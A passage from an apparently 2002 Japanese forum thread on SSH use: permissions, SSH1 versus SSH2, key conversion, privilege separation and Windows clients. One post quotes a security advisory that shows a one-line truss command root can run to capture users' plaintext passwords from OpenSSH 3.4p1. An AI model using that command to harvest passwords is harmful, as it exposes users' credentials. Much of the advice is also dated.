openssh にかぎらず、ドキュメンテーションって openbsd では
わりとおざなりにされてるような気がする。


129 名前:名無しさん@お腹いっぱい。 投稿日:02/08/18 22:50
/home/hoge/.ssh/authorized_keysとファイルを作ったのですが、
hogeのパーミッションを706とかにすると、
Authentication refused: bad ownership or modes for directory /home/hoge
とエラーが出てしまいます。
705だとログイン出来るのですが、その他ユーザの権限として書き込みの権限(2)を与えてはいけないんでしょうか。

130 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/18 22:53
>>129
少なくとも、好ましいことではないな。

131 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/18 23:00
>>129
sshd_configのStrictModesで挙動を変えられるが
お勧めはしない。


132 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/18 23:37
>>129
authorized_keysの中に勝手に鍵を追加されたりしたら、
誰でもあなたになりすますことができちゃいますよ。

133 名前:129ではないが… メール:sage 投稿日:02/08/19 00:23
>>132
いや、必ずしもauthorized_keysの内容が変更されるとは限らないYO!

>>129ではホームディレクトリ(/home/hoge)のパーミションの話はしているが、
~/.sshや~/.ssh/authorized_keysのパーミションについては何も言ってないから
な。

ホームディレクトリのパーミションを調べているのは、~/.[rs]hostsが関わってく
るからでしょう。ホームディレクトリが所有者以外に書き込み権限を与えられていた
ら、その権限を利用して~/.[rs]hostsを書き換えられる可能性があるからな。(直接
編集はできなくても削除→作成という手順で結果として書き換えることは可能)

>>129
ssh以外の部分でもいろいろ問題が出てくる(例:~/.profileとかも~.[rs]hostsと同様
書き換えられることになる)んだから、所有者以外に書き込み権限を与えるのは
やめとけ。

134 名前:124 メール:sage 投稿日:02/08/19 00:35
>>127
フォローThanksです。すなわち、ドキュメントとか見るより(そしてUsenetとかで
質問するより)実際にソースコードを読んだ方が早いYOってことね。

135 名前:129 投稿日:02/08/19 02:20
皆さんありがとうございました。
確かに自分以外に権限を与えるのは危険ですね…。
参考になりました。

136 名前:名無しさん@XEmacs (= 122) メール:sage 投稿日:02/08/19 16:33
>>134
>>126 (B-)

♯“方が早い”というよりは“方が確実だ”かな。結局全然早くない
♯ことも多い。


137 名前:yamasa メール:sage 投稿日:02/08/21 00:10
前スレの910さん、遅くなりましたがQandA変更しておきました。
ttp://home.jp.FreeBSD.org/cgi-bin/QandA/readmail.cgi/QandA-work/5481

138 名前:名無しさん@お腹いっぱい。 投稿日:02/08/26 09:21
SSH1 Protocol に対して SSH2 Protocol の利点ってなんでしょうか?


139 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/26 10:00
>>138
Man in the middle attack について調べてきましょう。

140 名前:名無しさん@XEmacs メール:sage 投稿日:02/08/26 13:19
>>139
> Man in the middle attack について調べてきましょう。

MITM に関しては SSH1 も SSH2 も等価。最初の一発はどっちもごまか
される可能性があるし、二回目以降はユーザ認証に公開鍵暗号を使っ
ていれば検出可能 (ただし、PKI に対応している商用版を持って来る
とまた話は別だが)。

いちばん大きな差はやっぱ integrity check の部分だろうね。SSH2は
CRC なんていい加減な方法ではなくちゃんとした MAC を用いているの
で、CORE SDI の insertioin attack に類似した型の攻撃が成立する
ことはほぼ不可能になってる (これ実は SSH1 でも成立しない筈なん
だけど)。


141 名前:名無しさん@XEmacs (=140) メール:sage 投稿日:02/08/26 14:16
>>140
> MITM に関しては SSH1 も SSH2 も等価。最初の一発はどっちもごまか
> される可能性があるし、二回目以降はユーザ認証に公開鍵暗号を使っ
> ていれば検出可能 (ただし、PKI に対応している商用版を持って来る
> とまた話は別だが)。

スマソ。この部分、嘘だった。正しくは

< MITM に関しては SSH1 も SSH2 も等価。ユーザ認証に公開鍵暗号を使っ
< ていれば一発目から検出可能。

だな。PKI 云々もあんま関係なかった。

142 名前:138 メール:sage 投稿日:02/08/26 18:25
ぐぐってみたらここの過去ログが出てきたよ〜 回線切って...
の前にスレの202あたりが結論って事でいいんでしょうか



143 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/26 21:31
> SSH1 Protocol に対して SSH2 Protocol の利点ってなんでしょうか?

mitm 以外にも、DH 鍵交換を使っているので、より安全。
と、されている。

144 名前:名無しさん@お腹いっぱい。 投稿日:02/08/27 10:54
>>142
> ぐぐってみたらここの過去ログが出てきたよ〜 回線切って...
> の前にスレの202あたりが結論って事でいいんでしょうか

どれどれ、見てみよう…。って、なるほど、この辺りが『SSH1 じゃダ
メだけど SSH2 なら MITM に対抗できる』という誤認識が普及した始
まりなわけね。

で、さらにそっから孫引用されている記事

http://sysadmin.oreilly.com/news/silverman_1200.html

も読んでみると、、、おい、この記事書いたの snail book の著者じゃ
ねーか。何考えてんだか。自分の本の記述と矛盾してるやん。

 In both SSH-1 and SSH-2, the key exchange is so designed
 that if she does this, the session identifiers for each
 side will be diferent.

Snail book (SSH The Secure Shell The Definitive Guide) p102 よ
り。“diferent”というスペルミスは原文ママ。引用文中の“this”っ
てのが MITM のこと。

で、正解は snail book の記述の方ね。

つーこって、誰が書いたものだろーとウェブ上の解説なんぞを信じる
とイタい目に逢うという新たな実例なんだ罠。

RTFS。


145 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/27 13:00
やっぱり夏はカレーだよね。


146 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/27 21:07
夏カレー
乙カレー
うな重

147 名前:名無しさん@お腹いっぱい。 投稿日:02/08/28 08:47
ユーザ sshd ってなんに使うんでしょう?
FreeBSD-stable 上の openssh 3.4p1 ですが、
ps をとっても見当たらないし。

# FreeBSD 質問スレの方がよかったかな


148 名前:何度もガイシュツ メール:sage 投稿日:02/08/28 09:27
>>147
http://www.unixuser.org/~haruyama/security/openssh/README.privsep_nihongo.txt

149 名前:147 メール:sage 投稿日:02/08/28 11:28
ありがと & ガイシュツすまそ。
認証時に一時的に使われるんですね。ps とって確認しました。

150 名前:名無しさん@お腹いっぱい。 投稿日:02/08/29 21:21
authorized_keys の中にめちゃくちゃ鍵がたまってきてます。
もう使わないホストの公開鍵もあるはずなんですが、
どれがどれやら…

それぞれの鍵がいつ最後に使われたかを記録してくれるといいんですけどね。
みなさん、authorized_keys は太りすぎていませんか?

151 名前:名無しさん@お腹いっぱい。 投稿日:02/08/29 21:39
known_hostsじゃないの?
authorized_keys は使いまわすので1つか2つしか入れてないが…


152 名前:名無しさん@お腹いっぱい。 投稿日:02/08/29 22:07
>>151 いや、各ホストですべて異なる鍵を ssh-keygen してるもんだから…
そうか、普通は異なるホストで全部異なる鍵ペアを作ったりしないのか… 鬱死

ところで、ssh-keygen で OpenSSH の鍵ファイル→ SSH2 の鍵ファイル ってできます?
-i オプションで SSH2 → OpenSSH はできるみたいなんだけど。
OpenSSH 3.4p1 を Debian GNU/Linux と cygwin で使用中。

153 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/08/29 22:31
>>152
いや、ホストごとに ssh-keygen するもんでない?
キーのコメント (メールアドレス) で区別できない?

154 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/01 02:04
すみません、かなりDQNな質問はこちらでは可能でしょうか?
まだ自分でサーバーを立て始めて勉強している最中なのですが、
sshでリモートからpublic key認証でログインしようとすると、

"No further authentication methods available."
No more authentication methods available.

と言われ、ログインできません。
使っているクライアントはSSH Secure Shell Client3.2.0.0(ちと古いですが)
サーバーにはopenssh-3.1p1-3(RedHat7.3上にて)なのですが。

色々調べてみたのですが、クライアントでジェネレートしたpublic keyを
サーバー上のhome/****/.sshにアップして、
ssh-keygen -i -f ******.dsa.pub >> authorized_keys2でコンバート
しろ、という方法がSSHのFAQに出ていたので試してみたのですが、
さっぱりダメでした。
何がいけない点なのかが、全くわかりません。。。
ものすごい厨房な質問で申し訳ないのですが、どなたか、ヒントを下さい。。。

155 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/01 02:26
> ところで、ssh-keygen で OpenSSH の鍵ファイル→ SSH2 の鍵ファイル ってできます?

できます。
ssh-keygen -i -f ssh_com_pubkey → openssh_pubkey
ssh-keygen -e -f openssh_pubkey → ssh_com_pubkey

> さっぱりダメでした。
> 何がいけない点なのかが、全くわかりません。。。

こっちも同感です。それだけの情報じゃね。


156 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/03 13:20
>>155 ありがとうございます。 -e オプションですか。
SECSH Public Key File Format に変換すればよかったんですね。

157 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/03 13:21
>>154 サーバ (sshd) のログを見てみると解決するかもしれませんよ。
あと、クライアント (ssh) で -v オプションを付けてみるというのはどうでしょうか?

158 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/05 02:08
>>154
そのバージョンってauthorized_keys2の2は必要?

159 名前:154ではないが メール:sage 投稿日:02/09/05 15:15
>>158
2.9.9より新しいバージョンなんでobsoleteではあるが、互換性を考慮して
「authorized_keys*2*でも可能」ということになっていると思うが、どうかな?

そのあたりの事情に詳しい人のフォローきぼん

160 名前:名無しさん@XEmacs (=141) メール:sage 投稿日:02/09/06 10:50
>>157
> あと、クライアント (ssh) で -v オプションを付けてみるというのはどうでしょうか?

>>154 によるとクライアントは ssh.com 版らしいので、ssh -d 3 く
らいかな。

んで、まさかクライアント側で ~/.ssh2/identification を作ってい
ない、とかいうオチではないよね?


161 名前:名無しさん@XEmacs メール:sage 投稿日:02/09/06 16:44
>>159
> 2.9.9より新しいバージョンなんでobsoleteではあるが、互換性を考慮して
> 「authorized_keys*2*でも可能」ということになっていると思うが、どうかな?
>
> そのあたりの事情に詳しい人のフォローきぼん

正確には『より新しい』じゃなく『以降の』バージョンでは、って
ことになるが、それ以外はその通り。

この辺りの措置は user_key_allowed という関数で行なわれるんだけ
ど、この関数、2.9.9 〜 3.4p1 では、まず authorized_keys を試し、
それでうまく行かなかったら authorized_keys2 を試すようになって
いるようだ。


162 名前:159 メール:sage 投稿日:02/09/06 20:37
>>161
> 正確には『より新しい』じゃなく『以降の』バージョンでは、って
> ことになるが、

おっとっと、たしかにそうですね。

> この辺りの措置は user_key_allowed という関数で行なわれるんだけ
> [...]

なるほど、参考になりますた。んじゃ、それを元にソースのdiffをとったり
してみるYO!! Thanks!!

163 名前:名無しさん@お腹いっぱい。 投稿日:02/09/11 00:37
厨な質問ですみません。
パスフレーズを使用せずに、パスワードで認証を行う場合でも
そのパスワードは暗号化されているのですか?


164 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/11 00:49
RTFAQ

165 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/11 01:23
↑つまんねーよ。


166 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/11 06:38
>>163
もう何度も出てきた質問でうんざり。ssh接続が確立した
時点で暗号化はされているので、パスワードも暗号化され
ている。

167 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/13 07:58
>>166 おそらくその「ssh接続が確立した時点」というのが正確に理解されていない場合が多いと思われ。
「認証が通った時点」と勘違いしている人もいるんだよね。

168 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/13 08:10
>「ssh接続が確立した時点」
>「認証が通った時点」
だっからどう違うの。おせえて、おせえて、おせえて


169 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/13 08:20
ssh -vして何が起きているのか眺めてください

170 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/13 08:58
sniff してみりゃいいじゃん。

171 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/13 09:00
>>168 TCP コネクション確立直後に、ホスト(サーバ)とクライアントの間で、ホスト鍵(各 sshd に固有の鍵、通常は sshd をインストールした時点で生成されて、それ以後は変更されることはない)の確認をする。
これによってホストがいつの間にか別のマシンにすりかえられていたりした場合に検出できる。
もしホスト鍵が以前そのホストに接続した時のものと異なっていたときには、警告される。

この時点で、以降のデータのやり取りを暗号化するための共通鍵が交換される。以降のデータのやり取りは、すべて暗号化される。いわゆる公開鍵暗号+共通鍵暗号ハイブリッド方式。

いくつかある認証を試すのは、これ以降の話。たとえば「ユーザ名+パスワード」による認証の際のデータも、すべて暗号化される。なので、安心。


172 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/13 09:02
>>171 なので、
「ssh接続が確立した時点」=通信路を共通鍵暗号で暗号化するために必要な鍵の交換が終わった時点
「認証が通った時点」=文字通り、認証にパスして、フォワーディングなどのセットアップが終わった時点

173 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/13 09:06
ちょっと古いけど、これ読め。
http://www.itojun.org/paper/wide-9811-ssh-tutorial/

174 名前:168 メール:sage 投稿日:02/09/13 09:23
>>169 - 173
みなさんご親切にありがとうございまひた
さよか、わてはまだ鍵の交換ができてないのに
認証を焦ってまひた
がんばりまふ


175 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/13 09:27
>>173 をいとぢゅん氏のか

176 名前:名無しさん@お腹いっぱい。 投稿日:02/09/14 18:41
ログイン時 .bashrcで、fortune等を実行していると,scpが利用できなくなります。
なんとかfortuneを実行させたいのですが、
シェルスクリプト等でscpによるセッションを判定できる方法ってありますか?

177 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/14 19:05
.bash_profile
.bash_login
.profile

178 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/14 19:40
>>177
cygwinスレに詳しく書いてあったので .bash_profileから実行してみました
そうすると、ログイン時しか表示されなくなります。
ktermなどの端末を開いた時すべてで表示させたいんです。

179 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/14 19:42
あ、全ての端末でログインオプションをつけりゃいいのか。

180 名前:名無しさん@お腹いっぱい。 投稿日:02/09/15 14:41
$PS1とか$BASHとか。
あるいは、ttyを持っているかどうか、という基準で
if tty >/dev/null 2>&1
という手もあるかも知れない。

181 名前:名無しさん@お腹いっぱい。 投稿日:02/09/15 14:44
環境変数 SSH_TTY を確認すべし。

182 名前:名無しさん@お腹いっぱい。 投稿日:02/09/18 18:51
SSH のポートフォワーディングで、 Windows のファイル共有のためのトラフィック通せませんかね?
つまり NetBIOS over TCP/IP を通したいってことなんですが…
素直に PPTP とかで VPN 張れってのは、無しの方向で。

183 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/18 21:18
WebDAV にしとけ ってこれも余り好ましくないけどな

184 名前:http://www.securiteam.com 投稿日:02/09/18 22:08
こんなの来たんだけど (((;゚Д゚)))ガクガクブルブル???

OpenSSH 3.4p1 Allows Revealing of Password (Privsep Feature)
------------------------------------------------------------------------
SUMMARY

During authentication, OpenSSH 3.4p1 with privsep enabled passes the
cleartext password from the main process to the privsep child using a
pipe. Using strace or truss, root can see the user's plaintext password
flying by. Andrew observed this behavior from OpenSSH 3.4p1 built using
GCC on Solaris 2.8 and the current Debian OpenSSH 3.4p1 package.

DETAILS

The level of effort to determine clear text passwords, for even the most
inexperienced UNIX administrator, is almost zero given the above. Andrew
realizes that no matter how you slice it, it will be possible for root to
grab the password from wherever it is stored in memory. Alternatively,
recompile SSHd to log the password, or any number of other ways. However,
the methods Andrew just mentioned all require someone with significantly
more know how than:
truss -fp `cat /var/run/sshd.pid`

Vendor response:
Theo and Markus told Andrew that this is not an issue. Theo says that you
cannot prevent root from determining a user's password. Andrew does not
disagree but asked why OpenBSD bothers to encrypt user passwords at all if
that is his attitude.

185 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/18 22:25
ここが笑えますね。

ベンダの反応:
> Theo (de raadt) と Markus (Friedl) は発見者 Andrew に対し、これは問題にはならないと
> 伝えた。Theo いわく、root がユーザのパスワードを見るのを防ぐことはできないからだという。
> Andrew はこれを否定しなかったが、それならなぜ OpenBSD はユーザのパスワードを
> わざわざ暗号化しているのかとたずねた。


186 名前:名無しさん@お腹いっぱい。 投稿日:02/09/18 22:56
OpenSSHが偽物に摩り替えられていた事件で、相当に信頼が揺らいだ
気がする。

187 名前:名無しさん@お腹いっぱい。 投稿日:02/09/18 22:58
のっとられても絶対にファイルのすり替えをできない
ようなFTPサーバーを作ることは可能だと思うが、
どうだろうか?READONLYのファイルシステムあるいはライト
プロテクトのあるメディアにOSとかFTP用のファイルを置き、
ログは別のマシンに転送するという具合にやれば、
のっとられても、何もできないはずだが。。。

188 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/18 23:00
>>182 できます。


189 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/18 23:29
>>187
リモートで管理する限り不可能。

190 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/19 00:13
>>187
鋼鉄なんとかってやつでそういうのやってるよね


191 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/19 00:15
truss するだけなんて、あまりに簡単過ぎ。

main process が privsep child を fork する前に、あらかじめ共有鍵を
つくっておき、通信路をその共有鍵で暗号化するだけで解決するのに、
なんで問題じゃないとかいって見ないふりするんだろ?


192 名前:http://www.securiteam.com 投稿日:02/09/19 01:18
Web掲載されたのでage
http://www.securiteam.com/unixfocus/5VP0H2A8AK.html

193 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/19 01:37

   ま   た   テ   オ   で   ラ   ア   ア  づ   か



194 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/19 02:14
>>191
rootなんだから、kmemでもなんでも見れるから、ってことじゃないの?
というかrootがその気になればsshd入れかえることだってできるんだし、
見ようと思ったらいつでも見れるでしょう。

でもまぁ確かに、お手軽ではあるけどね。


195 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/19 02:23
>>194
乗っ取られた時点で負けというのは確かなんだが、それでもパスワード収集
までに時間と手間を掛けさせるのは、セキュリティ面では意味があると思うな。

そファイル入れ替えは tripwire なんかでトラップが張ってあれば検出できる
可能性もあるしさ。

196 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/19 02:31
Theoのあのガキっぽさはなかなか気に入ってるんだけどな。

197 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/19 10:50
>>194

もちろんその通りだし、心底悪意のある root に対しては、
RSAAuthenticationのような手段をとらない限り、普通は
対抗しようがない。
じゃ直さなくてもまったく問題がないかというと、そうでもなくて
・侵入者に対抗するするため、実行可能なファイルを置いた
 パーティションは全て read only mount し、侵入者が
 侵入用コマンドを実行できないようにした状態でも、
 システムにあらかじめインストールされているコマンドだけ
 を使って、ごく簡単に password を盗める
・悪意のある侵入者ではなく正規の管理者が、ちょっとした
 できごころを起こした場合にも危険
といったことを考えると、やはり問題だろ。

> Theoのあのガキっぽさはなかなか気に入ってるんだけどな。

俺はガキに自分の身の安全を委ねたくはないんだけどなー。
現状では OpenSSH 以外に選択肢がないのがなんとも。


198 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/19 22:13
> 俺はガキに自分の身の安全を委ねたくはないんだけどなー。

とはいっても、実際には現代人の日常生活の大部分は
何らかのかたちでドキュソに支えられてるわけでさ。


199 名前:初期不良 メール:sage 投稿日:02/09/21 13:43
>>198
そう言うのが嫌な人はこっち使えばいいんじゃないの?
http://www.ssh.com/

200 名前:名無しさん@お腹いっぱい。 メール:ネタsage 投稿日:02/09/21 15:01
ttp://cr.yp.to/djbssh.html


201 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/21 16:15
>>199-200
どっちもライセンスの問題で安心して使えない罠

202 名前:名無しさん@お腹いっぱい。 投稿日:02/09/21 16:47
>>200 みえない…

203 名前:名無しさん メール:sage 投稿日:02/09/21 19:26
>>202
だってないもん。

204 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/21 19:29
>>203 (T_T)

205 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/21 20:21
>>202
djb 厨には見えてるらしい

206 名前:名無しさん@お腹いっぱい。 投稿日:02/09/21 22:49
「サンがOpenSSLプロジェクトに暗号化技術を提供」
http://japan.cnet.com/Enterprise/News/2002/Item/020920-3.html

これって使用もfreeなのかな?
だったらsshでも、鍵交換にECDHアルゴリズムを使ったり、
/etc/ssh/ssh_host_ecdsa_key なんてファイルができてたり
するようになるのかな。

207 名前:名無しさん@お腹いっぱい。 投稿日:02/09/22 20:17
ttp://www.ayera.com/teraterm/
TeraTerm Pro Web 3.1.1 - Enhanced Telnet/SSH2 Client
キター

208 名前:名無しさん@Emacs メール:sage 投稿日:02/09/22 20:19
>>207
マルチうざ


209 名前:名無しさん@お腹いっぱい。 投稿日:02/09/22 20:34
>>207
やったー。情報ありがとう。
>>208
マルチでいいのと悪いのと区別しろYo


210 名前:名無しさん@お腹いっぱい。 投稿日:02/09/22 20:37
>>207
ttp://www.ayera.com/teraterm/ttermpro_311.zip
ダウソできませんが、何か?

211 名前:!208 メール:sage 投稿日:02/09/22 20:40
>>209
うぜぇのはうぜえよ。

212 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/22 21:00
>207=209
分かり易すぎ

213 名前:207 メール:sage 投稿日:02/09/22 21:01
>>209
support@ayera.comに掛け合ってみますー。
ということでメール出してみました。

214 名前:名無しさん@お腹いっぱい。 投稿日:02/09/22 21:23
ダウソできない。

215 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/22 21:28
>>212
ちがわい。>>209はただtsshの糞ユーザに過ぎんがな、
一回SSH2のサーバ作ってつながらなくて苦労した馬鹿だ。>漏れのこと
漏れの他にも感動してる奴に>>210なんてのもいるじゃん。
>>207は大人だ。


216 名前:名無しさん@お腹いっぱい。 投稿日:02/09/22 21:54
>tssh
( ´,_ゝ`)プッ

217 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/22 21:59
tssh って何!?

218 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/22 22:03
>>216, >>217
tsshってttsshのことです。手が滑ったのが
分からないお前らはアフォですか。


219 名前:!216 && !217 メール:sage 投稿日:02/09/22 22:11
Tera Term SSHってttsshって略すのか。漏れ、tcshかと思ったよ…。


220 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/22 22:24
略でなくて、TTSSH が正式名でなかったっけ?

221 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/22 22:29
でもなぁ、もう PuTTY に慣れちゃったし、いまさら感が否めないなぁ。

222 名前:名無しさん@お腹いっぱい。 投稿日:02/09/22 22:33
まだPuTTYに手を出したばっかりの漏れには朗報ナリ。
一応期待。

223 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/22 22:54
今さらteratermのダッサイインターフェースなんかに戻れない

224 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/23 00:03
今さらWindowsのダッサイインターフェースなんかに戻れない

225 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/23 00:19
今さらcommand.comのダッサイインターフェイスなんかに戻れない

226 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/23 00:25
>>225
まぁ少なくともbashやtcshに比べたら遥かにダサイわな。

227 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/23 00:35
>>225
cmd.exe っていうのがかなりイイらしいよ

228 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/23 00:51
>227
50歩100歩
どんぐりの背比べ

229 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/23 00:56
>>227
それより ssh ってのがかなりオススメ

230 名前:名無しさん@お腹いっぱい。 投稿日:02/09/23 05:22
>>207
現在も>>210と同様、ダウンロードできないのだが…、ダウンロードできた人いる?
いたら使用した感想などをキボンヌ

231 名前:ダウソage メール:age 投稿日:02/09/23 17:48
>>230
ダウソできたよ!

TTSSH組み込んだ感じとほぼ同じ。SSH Forwardが無い。
謎のHTTPサーバ機能が付いてる。

232 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/23 18:55
>>231
ssh でつないで、ls -l ~/ とかやると、
[ENTER] を何度か打たないとリスト全部を表示できない。
バッファリングまわりが変なのかなぁ?

233 名前:207 メール:sage 投稿日:02/09/23 19:28
>>213
CEOから謝罪メールが返信されてきますた。
かなり吃驚。


234 名前:名無しさん@Emacs メール:sage 投稿日:02/09/23 19:31
>>232
もしかして使えない?


235 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/23 19:42
>>234
こんなんなるの俺だけなのかなぁ?ほかのひとは大丈夫なの?
サーバ側は、FreeBSD 4.5 の OpenSSH 3.4p1 で、特別な設定は特になし。
クライアントは、SSH 関係の設定はデフォルトのまま、圧縮とかもなし。

236 名前:231 メール:sage 投稿日:02/09/23 19:50
>>232
家も同じく。

WinXPにコレと、相手はVine2.1にOpenSSH 3.4p1
圧縮は無し。


237 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/23 20:35
>232
うちでも同じ。
接続先は Solaris 8 + OpenSSH 3.4p1

あと、EUC が使えないことに気づいたんで、
もう削除しちゃいました。
SJISなら一応表示はできてたけど。

238 名前:235 メール:sage 投稿日:02/09/23 20:41
>>237
WinXP ですが、うちでは Setup のデフォルトの SJIS を EUC にして EUC 使えたよ。

239 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/23 21:12
確かに表示が変だね。


240 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/23 21:13
公開鍵認証には対応していないのかな?

241 名前:初期不良 メール:sage 投稿日:02/09/23 21:20
>>240
うーむ、公開鍵認証オンリーにしてるから接続すらできん...

242 名前:231 メール:sage 投稿日:02/09/23 21:26
表示変だね。バッファに入ってるものが詰まって出る
みたいな感じ。文字化けとかは無くって、EUCで問題ないよ

screen使ってmew@emacsとか使うと画面切り替わりの際の
^Lは必須。この点だけでも直してくれないかなあ。

243 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/23 21:54
てか、わざわざ TeraTerm 上に載せる意味なんかあるの?

244 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/23 21:57
基本的な機能は TeraTerm のを利用するから 0から作るようりは簡単とかじゃない?

245 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/23 22:00
LAN 上の Windows から普通に接続してもこんなのが記録されるね。

Did not receive identification string from 192.168.0.3


246 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/23 22:01
>>243
シリアルコンソールも telnet も SSH も SSH2 も
みんな同じソフト上でできるならそれに越したことないんじゃない?

247 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/23 22:19
>246
PuTTYも全部できるが?

248 名前:246 メール:sage 投稿日:02/09/23 22:21
ごめん、微妙に嘘ついた。シリアルは出来ないね。
でも全部詰め込むメリットって何?

249 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/23 22:26
1つあれば用が足りる。

250 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/23 23:16
Tera Term に慣れてるから、とか。
なぜそんなに詰めこむのを嫌うの?

251 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/23 23:39
djb信者のかほり〜

252 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/24 01:15
toolbox approach ?

253 名前:名無しさん@お腹いっぱい。 投稿日:02/09/26 00:35
TeraTerm Pro Web 3.1.2 - Enhanced Telnet/SSH2 Client 
となっているんで試したのですが、皆さん^H^H^Hお前らと同じ状況ですね。
バッファリングが変。
[Setup]-[Recurring Command]ってなに?
3.1.1 の頃からあるのでしょうか?

254 名前:i6245 メール:sage 投稿日:02/09/26 01:09
俺 TeraTermPro + ttssh 使ってるなぁ。
Macro 結構組んでるから今更違うのに変えるのも面倒だ。。
そういえばなんで PuTTY 使わなかったんだろう。
良く覚えてないや。。

WinSCPは使ってるけど。。


255 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/26 13:03
>>240

Win2000 で putty の pagent を常駐させているのだが、そっから勝手に鍵データとってきて、公開鍵認証やるみたい。
ユーザ名を指定するだけで、パスワード無しで接続されてしまった。


256 名前:名無しさん@お腹いっぱい メール:sage 投稿日:02/09/26 17:41
いきなりですみません、WinSCPで質問なのですが・・・。
実は以下のことで確認をしたいので、どなたか親切な方、
教えてやって下さい。

とあるファイル「TEST.TXT」に対して、グループを設定しました。
そのグループに仮にですがAとBというユーザーが含まれています。
TEST.TXTのOWNERは、ユーザーAになっています。
ファイルのパーミッションは、664です。

そこでユーザーBが、サーバー側にあるTEST.TXTと同名のファイルを
ローカルからサーバーへアップロードをさせようとすると
「OPERATION NOT DENIED」と表示されてしまい、上書きの
アップロードをすることができません。
WinSCPでは、OWNERが違うとグループが同じでパーミッションでも許可して
いてもファイルのOWNERと違うユーザーは上書きアップロードをすることが
できないのでしょうか。

よければ教えてください。
どうも失礼しました


257 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/26 17:45
>>256
そのファイルがあるディレクトリの
owner と permission はどうよ。

258 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/26 18:19
がいしゅつかもしれませんが

ssh2 のログイン情報等は /var/log/messages に出力されていると思いますが
ssh2関連の情報だけを、別のログファイルへ (ex: /var/log/ssh2_log etc...) 出力する事は可能なのでしょうか?



259 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/26 18:26
>>>258 /etc/syslog.conf

260 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/26 18:34
>>259

はい、/etc/syslog.conf に

# ssh2d login
*.sshd2 /var/log/sshd.log

に、記述し、syslogdにHUPをかけたのですが、うまく sshd.logには、出力されないのです。

記述の仕方が間違っているのでしょうか?

261 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/26 18:41
>>260 はい。


262 名前:名無しさん@お腹いっぱい メール:sage 投稿日:02/09/26 18:41
>>257
ファイルが入っているディレクトリのグループは、ファイルと一緒ですが、
OWNERはAでもBでもないまた別のアカウントです。
これではいけないでしょうか。

